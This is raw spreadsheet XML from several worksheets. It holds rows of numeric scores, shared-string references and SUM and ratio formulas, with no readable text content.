      <c r="E62" s="34">
        <v>1.0</v>
      </c>
      <c r="F62" s="34" t="s">
        <v>422</v>
      </c>
      <c r="G62" s="34">
        <v>1.0</v>
      </c>
      <c r="H62" s="34">
        <v>0.0</v>
      </c>
      <c r="I62" s="34" t="s">
        <v>423</v>
      </c>
      <c r="J62" s="34">
        <v>1.0</v>
      </c>
      <c r="K62" s="34">
        <v>0.0</v>
      </c>
      <c r="L62" s="34" t="s">
        <v>424</v>
      </c>
      <c r="M62" s="34">
        <v>1.0</v>
      </c>
      <c r="N62" s="36"/>
    </row>
    <row r="63" ht="15.75" customHeight="1">
      <c r="A63" s="40"/>
      <c r="B63" s="42"/>
      <c r="C63" s="34"/>
      <c r="D63" s="34"/>
      <c r="E63" s="34"/>
      <c r="F63" s="34"/>
      <c r="G63" s="34"/>
      <c r="H63" s="34"/>
      <c r="I63" s="34"/>
      <c r="J63" s="34"/>
      <c r="K63" s="34"/>
      <c r="L63" s="34"/>
      <c r="M63" s="34"/>
      <c r="N63" s="40"/>
    </row>
    <row r="64" ht="15.75" customHeight="1">
      <c r="A64" s="36" t="s">
        <v>425</v>
      </c>
      <c r="B64" s="34" t="s">
        <v>426</v>
      </c>
      <c r="C64" s="34">
        <v>1.0</v>
      </c>
      <c r="D64" s="34" t="s">
        <v>427</v>
      </c>
      <c r="E64" s="34">
        <v>1.0</v>
      </c>
      <c r="F64" s="34" t="s">
        <v>428</v>
      </c>
      <c r="G64" s="34">
        <v>1.0</v>
      </c>
      <c r="H64" s="34">
        <v>0.0</v>
      </c>
      <c r="I64" s="34" t="s">
        <v>429</v>
      </c>
      <c r="J64" s="34">
        <v>1.0</v>
      </c>
      <c r="K64" s="34">
        <v>0.0</v>
      </c>
      <c r="L64" s="34" t="s">
        <v>430</v>
      </c>
      <c r="M64" s="34">
        <v>1.0</v>
      </c>
      <c r="N64" s="36"/>
    </row>
    <row r="65" ht="15.75" customHeight="1">
      <c r="A65" s="36" t="s">
        <v>431</v>
      </c>
      <c r="B65" s="34" t="s">
        <v>432</v>
      </c>
      <c r="C65" s="34">
        <v>0.0</v>
      </c>
      <c r="D65" s="34" t="s">
        <v>433</v>
      </c>
      <c r="E65" s="43">
        <v>2.0</v>
      </c>
      <c r="F65" s="38" t="s">
        <v>434</v>
      </c>
      <c r="G65" s="43">
        <v>0.0</v>
      </c>
      <c r="H65" s="43">
        <v>0.0</v>
      </c>
      <c r="I65" s="43" t="s">
        <v>435</v>
      </c>
      <c r="J65" s="43">
        <v>2.0</v>
      </c>
      <c r="K65" s="43">
        <v>0.0</v>
      </c>
      <c r="L65" s="43" t="s">
        <v>436</v>
      </c>
      <c r="M65" s="43">
        <v>2.0</v>
      </c>
      <c r="N65" s="36"/>
    </row>
    <row r="66" ht="15.75" customHeight="1">
      <c r="A66" s="36"/>
      <c r="C66" s="44">
        <f>sum(C4:C65)</f>
        <v>23</v>
      </c>
      <c r="E66" s="10">
        <f>SUM(E4:E65)</f>
        <v>32</v>
      </c>
      <c r="G66" s="44">
        <f t="shared" ref="G66:H66" si="1">sum(G4:G65)</f>
        <v>23</v>
      </c>
      <c r="H66" s="44">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="J66" s="44">
        <f t="shared" ref="J66:K66" si="2">sum(J4:J65)</f>
        <v>32</v>
      </c>
      <c r="K66" s="44">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="N66" s="36"/>
    </row>
    <row r="67" ht="15.75" customHeight="1">
      <c r="A67" s="36"/>
      <c r="B67" s="36"/>
      <c r="D67" s="44"/>
      <c r="E67" s="44"/>
      <c r="F67" s="45"/>
      <c r="H67" s="10">
        <f>1/(23+1)</f>
        <v>0.04166666667</v>
      </c>
      <c r="I67" s="44"/>
      <c r="K67" s="10">
        <f>0</f>
        <v>0</v>
      </c>
      <c r="L67" s="44"/>
      <c r="M67" s="44"/>
      <c r="N67" s="36"/>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:B2"/>
    <mergeCell ref="C1:F1"/>
    <mergeCell ref="G1:L1"/>
    <mergeCell ref="M1:M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5.5"/>
    <col customWidth="1" min="11" max="11" width="27.38"/>
  </cols>
  <sheetData>
    <row r="1" ht="28.5" customHeight="1">
      <c r="A1" s="1" t="s">
        <v>23</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>24</v>
      </c>
      <c r="C1" s="14" t="s">
        <v>1</v>
      </c>
      <c r="G1" s="3" t="s">
        <v>2</v>
      </c>
      <c r="M1" s="4" t="s">
        <v>3</v>
      </c>
      <c r="N1" s="5"/>
      <c r="O1" s="5"/>
      <c r="P1" s="5"/>
      <c r="Q1" s="5"/>
      <c r="R1" s="5"/>
      <c r="S1" s="5"/>
      <c r="T1" s="5"/>
      <c r="U1" s="5"/>
      <c r="V1" s="5"/>
      <c r="W1" s="5"/>
      <c r="X1" s="5"/>
      <c r="Y1" s="5"/>
      <c r="Z1" s="5"/>
      <c r="AA1" s="5"/>
      <c r="AB1" s="5"/>
      <c r="AC1" s="5"/>
      <c r="AD1" s="5"/>
      <c r="AE1" s="5"/>
      <c r="AF1" s="5"/>
      <c r="AG1" s="5"/>
    </row>
    <row r="2" ht="15.75" customHeight="1">
      <c r="C2" s="6" t="s">
        <v>4</v>
      </c>
      <c r="D2" s="6" t="s">
        <v>25</v>
      </c>
      <c r="E2" s="7" t="s">
        <v>5</v>
      </c>
      <c r="F2" s="7" t="s">
        <v>26</v>
      </c>
      <c r="G2" s="8" t="s">
        <v>4</v>
      </c>
      <c r="H2" s="8" t="s">
        <v>27</v>
      </c>
      <c r="I2" s="8" t="s">
        <v>28</v>
      </c>
      <c r="J2" s="9" t="s">
        <v>5</v>
      </c>
      <c r="K2" s="9" t="s">
        <v>29</v>
      </c>
      <c r="L2" s="9" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="3" ht="15.75" customHeight="1">
      <c r="A3" s="4" t="s">
        <v>437</v>
      </c>
      <c r="B3" s="4" t="s">
        <v>438</v>
      </c>
      <c r="C3" s="4">
        <v>0.0</v>
      </c>
      <c r="D3" s="4" t="s">
        <v>439</v>
      </c>
      <c r="E3" s="4">
        <v>1.0</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>440</v>
      </c>
      <c r="G3" s="4">
        <v>0.0</v>
      </c>
      <c r="H3" s="4">
        <v>0.0</v>
      </c>
      <c r="I3" s="4" t="s">
        <v>441</v>
      </c>
      <c r="J3" s="4">
        <v>1.0</v>
      </c>
      <c r="K3" s="4">
        <v>0.0</v>
      </c>
      <c r="L3" s="4" t="s">
        <v>442</v>
      </c>
      <c r="M3" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="4" ht="15.75" customHeight="1">
      <c r="A4" s="4" t="s">
        <v>443</v>
      </c>
      <c r="B4" s="4" t="s">
        <v>444</v>
      </c>
      <c r="C4" s="4">
        <v>1.0</v>
      </c>
      <c r="D4" s="4" t="s">
        <v>445</v>
      </c>
      <c r="E4" s="4">
        <v>1.0</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>446</v>
      </c>
      <c r="G4" s="4">
        <v>1.0</v>
      </c>
      <c r="H4" s="4">
        <v>0.0</v>
      </c>
      <c r="I4" s="4" t="s">
        <v>447</v>
      </c>
      <c r="J4" s="4">
        <v>1.0</v>
      </c>
      <c r="K4" s="4">
        <v>0.0</v>
      </c>
      <c r="L4" s="4" t="s">
        <v>448</v>
      </c>
      <c r="M4" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="5" ht="15.75" customHeight="1">
      <c r="A5" s="4" t="s">
        <v>449</v>
      </c>
      <c r="B5" s="4" t="s">
        <v>450</v>
      </c>
      <c r="C5" s="4">
        <v>0.0</v>
      </c>
      <c r="D5" s="4" t="s">
        <v>451</v>
      </c>
      <c r="E5" s="4">
        <v>1.0</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>446</v>
      </c>
      <c r="G5" s="4">
        <v>1.0</v>
      </c>
      <c r="H5" s="4">
        <v>0.0</v>
      </c>
      <c r="I5" s="4" t="s">
        <v>446</v>
      </c>
      <c r="J5" s="4">
        <v>1.0</v>
      </c>
      <c r="K5" s="4">
        <v>0.0</v>
      </c>
      <c r="L5" s="4" t="s">
        <v>446</v>
      </c>
      <c r="M5" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1">
      <c r="A6" s="4" t="s">
        <v>452</v>
      </c>
      <c r="B6" s="4" t="s">
        <v>453</v>
      </c>
      <c r="C6" s="4">
        <v>1.0</v>
      </c>
      <c r="D6" s="4" t="s">
        <v>454</v>
      </c>
      <c r="E6" s="4">
        <v>1.0</v>
      </c>
      <c r="F6" s="4" t="s">
        <v>455</v>
      </c>
      <c r="G6" s="4">
        <v>1.0</v>
      </c>
      <c r="H6" s="4">
        <v>0.0</v>
      </c>
      <c r="I6" s="4" t="s">
        <v>456</v>
      </c>
      <c r="J6" s="4">
        <v>1.0</v>
      </c>
      <c r="K6" s="4">
        <v>0.0</v>
      </c>
      <c r="L6" s="4" t="s">
        <v>457</v>
      </c>
      <c r="M6" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1">
      <c r="A7" s="4" t="s">
        <v>458</v>
      </c>
      <c r="B7" s="4" t="s">
        <v>459</v>
      </c>
      <c r="C7" s="4">
        <v>1.0</v>
      </c>
      <c r="D7" s="4" t="s">
        <v>460</v>
      </c>
      <c r="E7" s="4">
        <v>1.0</v>
      </c>
      <c r="F7" s="4" t="s">
        <v>461</v>
      </c>
      <c r="G7" s="4">
        <v>1.0</v>
      </c>
      <c r="H7" s="4">
        <v>0.0</v>
      </c>
      <c r="I7" s="4" t="s">
        <v>462</v>
      </c>
      <c r="J7" s="4">
        <v>1.0</v>
      </c>
      <c r="K7" s="4">
        <v>0.0</v>
      </c>
      <c r="L7" s="4" t="s">
        <v>463</v>
      </c>
      <c r="M7" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1">
      <c r="A8" s="4" t="s">
        <v>464</v>
      </c>
      <c r="B8" s="4" t="s">
        <v>465</v>
      </c>
      <c r="C8" s="4">
        <v>1.0</v>
      </c>
      <c r="D8" s="4" t="s">
        <v>466</v>
      </c>
      <c r="E8" s="4">
        <v>1.0</v>
      </c>
      <c r="F8" s="4" t="s">
        <v>467</v>
      </c>
      <c r="G8" s="4">
        <v>1.0</v>
      </c>
      <c r="H8" s="4">
        <v>0.0</v>
      </c>
      <c r="I8" s="4" t="s">
        <v>468</v>
      </c>
      <c r="J8" s="4">
        <v>1.0</v>
      </c>
      <c r="K8" s="4">
        <v>0.0</v>
      </c>
      <c r="L8" s="4" t="s">
        <v>469</v>
      </c>
      <c r="M8" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1">
      <c r="A9" s="4" t="s">
        <v>470</v>
      </c>
      <c r="B9" s="4" t="s">
        <v>471</v>
      </c>
      <c r="C9" s="4">
        <v>0.0</v>
      </c>
      <c r="D9" s="4" t="s">
        <v>472</v>
      </c>
      <c r="E9" s="4">
        <v>1.0</v>
      </c>
      <c r="F9" s="4" t="s">
        <v>473</v>
      </c>
      <c r="G9" s="4">
        <v>1.0</v>
      </c>
      <c r="H9" s="4">
        <v>0.0</v>
      </c>
      <c r="I9" s="4" t="s">
        <v>474</v>
      </c>
      <c r="J9" s="4">
        <v>1.0</v>
      </c>
      <c r="K9" s="4">
        <v>0.0</v>
      </c>
      <c r="L9" s="4" t="s">
        <v>475</v>
      </c>
      <c r="M9" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1">
      <c r="A10" s="4" t="s">
        <v>476</v>
      </c>
      <c r="B10" s="4" t="s">
        <v>477</v>
      </c>
      <c r="C10" s="4">
        <v>0.0</v>
      </c>
      <c r="D10" s="4" t="s">
        <v>478</v>
      </c>
      <c r="E10" s="4">
        <v>1.0</v>
      </c>
      <c r="F10" s="4" t="s">
        <v>479</v>
      </c>
      <c r="G10" s="4">
        <v>1.0</v>
      </c>
      <c r="H10" s="4">
        <v>0.0</v>
      </c>
      <c r="I10" s="4" t="s">
        <v>478</v>
      </c>
      <c r="J10" s="4">
        <v>1.0</v>
      </c>
      <c r="K10" s="4">
        <v>0.0</v>
      </c>
      <c r="L10" s="4" t="s">
        <v>478</v>
      </c>
      <c r="M10" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1">
      <c r="A11" s="4" t="s">
        <v>480</v>
      </c>
      <c r="B11" s="4" t="s">
        <v>481</v>
      </c>
      <c r="C11" s="4">
        <v>0.0</v>
      </c>
      <c r="D11" s="4" t="s">
        <v>482</v>
      </c>
      <c r="E11" s="4">
        <v>1.0</v>
      </c>
      <c r="F11" s="4" t="s">
        <v>483</v>
      </c>
      <c r="G11" s="4">
        <v>1.0</v>
      </c>
      <c r="H11" s="4">
        <v>0.0</v>
      </c>
      <c r="I11" s="4" t="s">
        <v>482</v>
      </c>
      <c r="J11" s="4">
        <v>1.0</v>
      </c>
      <c r="K11" s="4">
        <v>0.0</v>
      </c>
      <c r="L11" s="4" t="s">
        <v>482</v>
      </c>
      <c r="M11" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="12" ht="15.75" customHeight="1">
      <c r="A12" s="4" t="s">
        <v>484</v>
      </c>
      <c r="B12" s="4" t="s">
        <v>485</v>
      </c>
      <c r="C12" s="4">
        <v>0.0</v>
      </c>
      <c r="D12" s="4" t="s">
        <v>486</v>
      </c>
      <c r="E12" s="4">
        <v>1.0</v>
      </c>
      <c r="F12" s="4" t="s">
        <v>487</v>
      </c>
      <c r="G12" s="4">
        <v>0.0</v>
      </c>
      <c r="H12" s="4">
        <v>0.0</v>
      </c>
      <c r="I12" s="4" t="s">
        <v>486</v>
      </c>
      <c r="J12" s="4">
        <v>1.0</v>
      </c>
      <c r="K12" s="4">
        <v>0.0</v>
      </c>
      <c r="L12" s="4" t="s">
        <v>486</v>
      </c>
      <c r="M12" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1">
      <c r="A13" s="4" t="s">
        <v>488</v>
      </c>
      <c r="B13" s="4" t="s">
        <v>489</v>
      </c>
      <c r="C13" s="4">
        <v>0.0</v>
      </c>
      <c r="D13" s="4" t="s">
        <v>490</v>
      </c>
      <c r="E13" s="4">
        <v>1.0</v>
      </c>
      <c r="F13" s="4" t="s">
        <v>491</v>
      </c>
      <c r="G13" s="4">
        <v>1.0</v>
      </c>
      <c r="H13" s="4">
        <v>0.0</v>
      </c>
      <c r="I13" s="4" t="s">
        <v>490</v>
      </c>
      <c r="J13" s="4">
        <v>1.0</v>
      </c>
      <c r="K13" s="4">
        <v>0.0</v>
      </c>
      <c r="L13" s="4" t="s">
        <v>490</v>
      </c>
      <c r="M13" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1">
      <c r="A14" s="4" t="s">
        <v>492</v>
      </c>
      <c r="B14" s="4" t="s">
        <v>493</v>
      </c>
      <c r="C14" s="4">
        <v>4.0</v>
      </c>
      <c r="D14" s="4" t="s">
        <v>494</v>
      </c>
      <c r="E14" s="4">
        <v>1.0</v>
      </c>
      <c r="F14" s="4" t="s">
        <v>495</v>
      </c>
      <c r="G14" s="4">
        <v>5.0</v>
      </c>
      <c r="H14" s="4">
        <v>2.0</v>
      </c>
      <c r="I14" s="4" t="s">
        <v>496</v>
      </c>
      <c r="J14" s="4">
        <v>1.0</v>
      </c>
      <c r="K14" s="4">
        <v>0.0</v>
      </c>
      <c r="L14" s="4" t="s">
        <v>495</v>
      </c>
      <c r="M14" s="4">
        <v>6.0</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1">
      <c r="A15" s="4" t="s">
        <v>492</v>
      </c>
      <c r="B15" s="4" t="s">
        <v>497</v>
      </c>
      <c r="C15" s="4">
        <v>0.0</v>
      </c>
      <c r="D15" s="4" t="s">
        <v>494</v>
      </c>
      <c r="E15" s="4">
        <v>1.0</v>
      </c>
      <c r="F15" s="4" t="s">
        <v>498</v>
      </c>
      <c r="G15" s="4">
        <v>0.0</v>
      </c>
      <c r="H15" s="4">
        <v>0.0</v>
      </c>
      <c r="I15" s="4" t="s">
        <v>496</v>
      </c>
      <c r="J15" s="4">
        <v>1.0</v>
      </c>
      <c r="K15" s="4">
        <v>0.0</v>
      </c>
      <c r="L15" s="4" t="s">
        <v>498</v>
      </c>
      <c r="M15" s="4">
        <v>0.0</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1">
      <c r="A16" s="4" t="s">
        <v>492</v>
      </c>
      <c r="B16" s="4" t="s">
        <v>499</v>
      </c>
      <c r="C16" s="4">
        <v>0.0</v>
      </c>
      <c r="D16" s="4" t="s">
        <v>494</v>
      </c>
      <c r="E16" s="4">
        <v>1.0</v>
      </c>
      <c r="F16" s="4" t="s">
        <v>498</v>
      </c>
      <c r="G16" s="4">
        <v>0.0</v>
      </c>
      <c r="H16" s="4">
        <v>0.0</v>
      </c>
      <c r="I16" s="4" t="s">
        <v>496</v>
      </c>
      <c r="J16" s="4">
        <v>1.0</v>
      </c>
      <c r="K16" s="4">
        <v>0.0</v>
      </c>
      <c r="L16" s="4" t="s">
        <v>498</v>
      </c>
      <c r="M16" s="4">
        <v>0.0</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1">
      <c r="A17" s="4" t="s">
        <v>492</v>
      </c>
      <c r="B17" s="4" t="s">
        <v>500</v>
      </c>
      <c r="C17" s="4">
        <v>0.0</v>
      </c>
      <c r="D17" s="4" t="s">
        <v>494</v>
      </c>
      <c r="E17" s="4">
        <v>1.0</v>
      </c>
      <c r="F17" s="4" t="s">
        <v>501</v>
      </c>
      <c r="G17" s="4">
        <v>0.0</v>
      </c>
      <c r="H17" s="4">
        <v>0.0</v>
      </c>
      <c r="I17" s="4" t="s">
        <v>496</v>
      </c>
      <c r="J17" s="4">
        <v>1.0</v>
      </c>
      <c r="K17" s="4">
        <v>0.0</v>
      </c>
      <c r="L17" s="4" t="s">
        <v>501</v>
      </c>
      <c r="M17" s="4">
        <v>0.0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1">
      <c r="A18" s="4" t="s">
        <v>492</v>
      </c>
      <c r="B18" s="4" t="s">
        <v>502</v>
      </c>
      <c r="C18" s="4">
        <v>0.0</v>
      </c>
      <c r="D18" s="4" t="s">
        <v>494</v>
      </c>
      <c r="E18" s="4">
        <v>1.0</v>
      </c>
      <c r="F18" s="4" t="s">
        <v>503</v>
      </c>
      <c r="G18" s="4">
        <v>0.0</v>
      </c>
      <c r="H18" s="4">
        <v>0.0</v>
      </c>
      <c r="I18" s="4" t="s">
        <v>496</v>
      </c>
      <c r="J18" s="4">
        <v>1.0</v>
      </c>
      <c r="K18" s="4">
        <v>0.0</v>
      </c>
      <c r="L18" s="4" t="s">
        <v>503</v>
      </c>
      <c r="M18" s="4">
        <v>0.0</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1">
      <c r="A19" s="4" t="s">
        <v>492</v>
      </c>
      <c r="B19" s="4" t="s">
        <v>504</v>
      </c>
      <c r="C19" s="4">
        <v>0.0</v>
      </c>
      <c r="D19" s="4" t="s">
        <v>494</v>
      </c>
      <c r="E19" s="4">
        <v>1.0</v>
      </c>
      <c r="F19" s="4" t="s">
        <v>505</v>
      </c>
      <c r="G19" s="4">
        <v>0.0</v>
      </c>
      <c r="H19" s="4">
        <v>0.0</v>
      </c>
      <c r="I19" s="4" t="s">
        <v>496</v>
      </c>
      <c r="J19" s="4">
        <v>1.0</v>
      </c>
      <c r="K19" s="4">
        <v>0.0</v>
      </c>
      <c r="L19" s="4" t="s">
        <v>505</v>
      </c>
      <c r="M19" s="4">
        <v>0.0</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1">
      <c r="A20" s="4" t="s">
        <v>506</v>
      </c>
      <c r="B20" s="4" t="s">
        <v>507</v>
      </c>
      <c r="C20" s="4">
        <v>1.0</v>
      </c>
      <c r="D20" s="4" t="s">
        <v>508</v>
      </c>
      <c r="E20" s="4">
        <v>1.0</v>
      </c>
      <c r="F20" s="4" t="s">
        <v>509</v>
      </c>
      <c r="G20" s="4">
        <v>1.0</v>
      </c>
      <c r="H20" s="4">
        <v>1.0</v>
      </c>
      <c r="I20" s="4" t="s">
        <v>510</v>
      </c>
      <c r="J20" s="4">
        <v>1.0</v>
      </c>
      <c r="K20" s="4">
        <v>0.0</v>
      </c>
      <c r="L20" s="4" t="s">
        <v>511</v>
      </c>
      <c r="M20" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1">
      <c r="A21" s="4" t="s">
        <v>512</v>
      </c>
      <c r="B21" s="4" t="s">
        <v>513</v>
      </c>
      <c r="C21" s="4">
        <v>2.0</v>
      </c>
      <c r="D21" s="4" t="s">
        <v>514</v>
      </c>
      <c r="E21" s="4">
        <v>2.0</v>
      </c>
      <c r="F21" s="4" t="s">
        <v>515</v>
      </c>
      <c r="G21" s="4">
        <v>1.0</v>
      </c>
      <c r="H21" s="4">
        <v>1.0</v>
      </c>
      <c r="I21" s="4" t="s">
        <v>516</v>
      </c>
      <c r="J21" s="4">
        <v>2.0</v>
      </c>
      <c r="K21" s="4">
        <v>0.0</v>
      </c>
      <c r="L21" s="4" t="s">
        <v>517</v>
      </c>
      <c r="M21" s="4">
        <v>2.0</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1">
      <c r="A22" s="4" t="s">
        <v>518</v>
      </c>
      <c r="B22" s="4" t="s">
        <v>519</v>
      </c>
      <c r="C22" s="4">
        <v>1.0</v>
      </c>
      <c r="D22" s="4" t="s">
        <v>520</v>
      </c>
      <c r="E22" s="4">
        <v>2.0</v>
      </c>
      <c r="F22" s="4" t="s">
        <v>521</v>
      </c>
      <c r="G22" s="4">
        <v>1.0</v>
      </c>
      <c r="H22" s="4">
        <v>0.0</v>
      </c>
      <c r="I22" s="4" t="s">
        <v>522</v>
      </c>
      <c r="J22" s="4">
        <v>2.0</v>
      </c>
      <c r="K22" s="4">
        <v>0.0</v>
      </c>
      <c r="L22" s="4" t="s">
        <v>523</v>
      </c>
      <c r="M22" s="4">
        <v>2.0</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1">
      <c r="A23" s="4" t="s">
        <v>518</v>
      </c>
      <c r="B23" s="4" t="s">
        <v>524</v>
      </c>
      <c r="C23" s="4">
        <v>0.0</v>
      </c>
      <c r="D23" s="4" t="s">
        <v>520</v>
      </c>
      <c r="E23" s="4">
        <v>1.0</v>
      </c>
      <c r="F23" s="4" t="s">
        <v>521</v>
      </c>
      <c r="G23" s="4">
        <v>1.0</v>
      </c>
      <c r="H23" s="4">
        <v>0.0</v>
      </c>
      <c r="I23" s="4" t="s">
        <v>522</v>
      </c>
      <c r="J23" s="4">
        <v>1.0</v>
      </c>
      <c r="K23" s="4">
        <v>0.0</v>
      </c>
      <c r="L23" s="4" t="s">
        <v>525</v>
      </c>
      <c r="M23" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1">
      <c r="C24" s="10">
        <f t="shared" ref="C24:E24" si="1">sum(C3:C23)</f>
        <v>12</v>
      </c>
      <c r="D24" s="10">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="E24" s="10">
        <f t="shared" si="1"/>
        <v>23</v>
      </c>
      <c r="G24" s="10">
        <f t="shared" ref="G24:M24" si="2">sum(G3:G23)</f>
        <v>18</v>
      </c>
      <c r="H24" s="10">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="I24" s="10">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J24" s="10">
        <f t="shared" si="2"/>
        <v>23</v>
      </c>
      <c r="K24" s="10">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L24" s="10">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="M24" s="10">
        <f t="shared" si="2"/>
        <v>23</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1">
      <c r="H25" s="10">
        <f>4/(18+4)</f>
        <v>0.1818181818</v>
      </c>
      <c r="K25" s="4">
        <v>0.0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5">
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:B2"/>
    <mergeCell ref="C1:F1"/>
    <mergeCell ref="G1:L1"/>
    <mergeCell ref="M1:M2"/>
  </mergeCells>
  <conditionalFormatting sqref="N1:AG1">
    <cfRule type="notContainsBlanks" dxfId="0" priority="1">
      <formula>LEN(TRIM(N1))&gt;0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2.5"/>
    <col customWidth="1" min="11" max="11" width="20.63"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="s">
        <v>23</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>24</v>
      </c>
      <c r="C1" s="14" t="s">
        <v>1</v>
      </c>
      <c r="G1" s="3" t="s">
        <v>2</v>
      </c>
      <c r="M1" s="4" t="s">
        <v>3</v>
      </c>
      <c r="N1" s="36"/>
      <c r="O1" s="34" t="s">
        <v>526</v>
      </c>
      <c r="P1" s="34" t="s">
        <v>527</v>
      </c>
      <c r="Q1" s="36" t="s">
        <v>528</v>
      </c>
      <c r="R1" s="1" t="s">
        <v>529</v>
      </c>
      <c r="S1" s="1" t="s">
        <v>530</v>
      </c>
      <c r="T1" s="1" t="s">
        <v>531</v>
      </c>
      <c r="U1" s="1" t="s">
        <v>532</v>
      </c>
      <c r="V1" s="1" t="s">
        <v>533</v>
      </c>
      <c r="W1" s="1" t="s">
        <v>534</v>
      </c>
      <c r="X1" s="1" t="s">
        <v>535</v>
      </c>
      <c r="Y1" s="4" t="s">
        <v>536</v>
      </c>
      <c r="Z1" s="1"/>
      <c r="AA1" s="34"/>
    </row>
    <row r="2" ht="15.75" customHeight="1">
      <c r="C2" s="6" t="s">
        <v>4</v>
      </c>
      <c r="D2" s="6" t="s">
        <v>25</v>
      </c>
      <c r="E2" s="7" t="s">
        <v>5</v>
      </c>
      <c r="F2" s="7" t="s">
        <v>26</v>
      </c>
      <c r="G2" s="8" t="s">
        <v>4</v>
      </c>
      <c r="H2" s="8" t="s">
        <v>27</v>
      </c>
      <c r="I2" s="8" t="s">
        <v>28</v>
      </c>
      <c r="J2" s="9" t="s">
        <v>5</v>
      </c>
      <c r="K2" s="9" t="s">
        <v>29</v>
      </c>
      <c r="L2" s="9" t="s">
        <v>26</v>
      </c>
      <c r="N2" s="4"/>
    </row>
    <row r="3" ht="15.75" customHeight="1">
      <c r="A3" s="4" t="s">
        <v>537</v>
      </c>
      <c r="B3" s="4" t="s">
        <v>538</v>
      </c>
      <c r="C3" s="4">
        <v>0.0</v>
      </c>
      <c r="D3" s="4" t="s">
        <v>539</v>
      </c>
      <c r="E3" s="4">
        <v>1.0</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>540</v>
      </c>
      <c r="G3" s="4">
        <v>0.0</v>
      </c>
      <c r="H3" s="4">
        <v>0.0</v>
      </c>
      <c r="I3" s="4" t="s">
        <v>541</v>
      </c>
      <c r="J3" s="4">
        <v>1.0</v>
      </c>
      <c r="K3" s="4">
        <v>0.0</v>
      </c>
      <c r="L3" s="4" t="s">
        <v>542</v>
      </c>
      <c r="M3" s="4">
        <v>2.0</v>
      </c>
      <c r="N3" s="4"/>
    </row>
    <row r="4" ht="15.75" customHeight="1">
      <c r="A4" s="4"/>
      <c r="B4" s="4" t="s">
        <v>543</v>
      </c>
      <c r="C4" s="4">
        <v>0.0</v>
      </c>
      <c r="D4" s="4"/>
      <c r="E4" s="4">
        <v>1.0</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>544</v>
      </c>
      <c r="G4" s="4">
        <v>1.0</v>
      </c>
      <c r="H4" s="4">
        <v>0.0</v>
      </c>
      <c r="I4" s="4" t="s">
        <v>545</v>
      </c>
      <c r="J4" s="4">
        <v>1.0</v>
      </c>
      <c r="K4" s="4">
        <v>0.0</v>
      </c>
      <c r="L4" s="4" t="s">
        <v>546</v>
      </c>
      <c r="M4" s="4">
        <v>0.0</v>
      </c>
      <c r="N4" s="4"/>
    </row>
    <row r="5" ht="15.75" customHeight="1">
      <c r="A5" s="4" t="s">
        <v>547</v>
      </c>
      <c r="B5" s="4" t="s">
        <v>548</v>
      </c>
      <c r="C5" s="4">
        <v>1.0</v>
      </c>
      <c r="D5" s="4" t="s">
        <v>549</v>
      </c>
      <c r="E5" s="4">
        <v>1.0</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>550</v>
      </c>
      <c r="G5" s="4">
        <v>1.0</v>
      </c>
      <c r="H5" s="4">
        <v>0.0</v>
      </c>
      <c r="I5" s="4" t="s">
        <v>551</v>
      </c>
      <c r="J5" s="4">
        <v>1.0</v>
      </c>
      <c r="K5" s="4">
        <v>0.0</v>
      </c>
      <c r="L5" s="4" t="s">
        <v>544</v>
      </c>
      <c r="M5" s="4">
        <v>1.0</v>
      </c>
      <c r="N5" s="4"/>
    </row>
    <row r="6" ht="15.75" customHeight="1">
      <c r="A6" s="4" t="s">
        <v>552</v>
      </c>
      <c r="B6" s="4" t="s">
        <v>553</v>
      </c>
      <c r="C6" s="4">
        <v>1.0</v>
      </c>
      <c r="D6" s="4" t="s">
        <v>554</v>
      </c>
      <c r="E6" s="4">
        <v>1.0</v>
      </c>
      <c r="F6" s="4" t="s">
        <v>555</v>
      </c>
      <c r="G6" s="4">
        <v>1.0</v>
      </c>
      <c r="H6" s="4">
        <v>0.0</v>
      </c>
      <c r="I6" s="4" t="s">
        <v>556</v>
      </c>
      <c r="J6" s="4">
        <v>1.0</v>
